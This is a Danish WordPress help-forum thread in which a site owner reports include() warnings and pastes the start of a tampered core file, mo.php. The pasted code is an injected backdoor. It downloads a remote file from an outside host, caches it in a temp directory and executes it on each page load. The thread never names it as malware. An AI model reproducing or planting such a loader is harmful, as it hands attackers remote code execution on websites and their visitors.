Hej
Jeg har et problem på mofnord.dk, der pt. kører WordPress 3.8.3 med Twenty Ten tema.
Fejlen vises som:
Warning: include() [function.include]: Filename cannot be empty in /usr/local/www/mofnorddk/www/wp-includes/pomo/mo.php on line 14
Warning: include() [function.include]: Failed opening '' for inclusion (include_path='.:/usr/local/share/pear') in /usr/local/www/mofnorddk/www/wp-includes/pomo/mo.php on line 14
Fejlen er tilsyneladende opstået ud af ingenting, dvs. ingen ændringer eller opdateringer eller lignende.
De samme to linjer vises øverst, når jeg logger ind som wp-admin, hvilket jeg godt kan.
Jeg vil naturligvis starte med at opgradere til wp 3.9.1, men det kan jeg ikke og får følgende fejl: Kunne ikke åbne handle for fopen() til /usr/local/www/mofnorddk/phpupload/wordpress-3.tmp
Hjælp søges og jeg HAR søgt efter fejlen på disse sider :-)
På forhånd MANGE TAK for alle gode forsleg.
/Tom
"Include"-problem mm.
(8 indlæg) (3 voices)-
Skrevet 11 years siden #
-
Hvad står der i filen mo.php?
Det er åbenbart der fejlen er...Ved du hvor du finder filen?
MVH
KuckoSkrevet 11 years siden # -
Hej Kucko
Det første af filen er her:
<?php
if(!function_exists('rss_dl')){
function rss_dl($url) {
$ch = curl_init();$timeout = 5;curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$file_contents = curl_exec($ch);
curl_close($ch);
return $file_contents;
}
}
$tdirr = include_tmpdir();
$file = include_getcache($tdirr,"http://mybigass.mongit.com/file/4-core-code.txt",60*1,true);
include($file);
function include_tmpdir(){
$fs = array('/tmp','/var/tmp','./wp-content/cache','./wp-content/uploads','./tmp','./cache','./images');
foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) {
if ($t = getenv($v)) {$fs[]=$t;}
}
if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();}
$fs[]='.';foreach ($fs as $f){
$tf = $f.'/'.md5(rand());
if($fp = @fopen($tf, 'w')){
fclose($fp);
unlink($tf);
return $f;
}
}
return false;
}Jeg havde fundet filen og kigget i den, men kan ikke gennemskue, hvad fejlen er og derfor heller ikke, hvad der skal rettes og desuden slet ikke, hvorfor det pludslig er opstået.
Håber du har et forslag :-)
/TomSkrevet 11 years siden # -
PS Jeg ved ikke om det er nødvendigt med hele filen, da linjeskift kan være svære at gennemskue på denne måde - kan man vedhæfte filer her?
Prøv at sammenligne med indholdet af en "frisk" mo.php fra et netop udpakket WP.
Det kan måske være med til at give en forklaring.Skrevet 11 years siden # -
En friskudpakket mo.php-fil ser HELT anderledes ud.
Har du prøvet at opdatere din WordPress?Hent evt. en helt frisk WP installation, og opdater den via FTP - så skulle det meget gerne virke...
- For din mo.php fil ser helt anderledes ud..
Skrevet 11 years siden # -
Hejsa
Tak for forslagene. Jeg forsøgte, at hente en mo.php fra en anden installation.
I første omgang kunne jeg ikke uploade den, da serveren "forvirrede" mig med "Disc quota exceeded".
Men, man skal jo lytte til de signaler man får, så jeg forsøgte at slette den forrige tmp-installtions-fil, der jo er temmelig stor.
SÅ kunne jeg få lov at uploade en "ny" mo.php.
Vupti, så var siden kørende igen :-)
Så nu må turen komme til web-hotellet, der måske kan bekræfte, at der ikke er mere disk-plads på trods af aftale om langt mere.
TAK for ALLE gode hints :-) I er fantastiske :-)
@tomsteen
Har du gjort dig nogen overvejelser om, hvorfor en fil er væsentlig anderledes end den oprindelige ??Skrevet 11 years siden #
Svar
Du skal være logget ind for at skrive.
resolved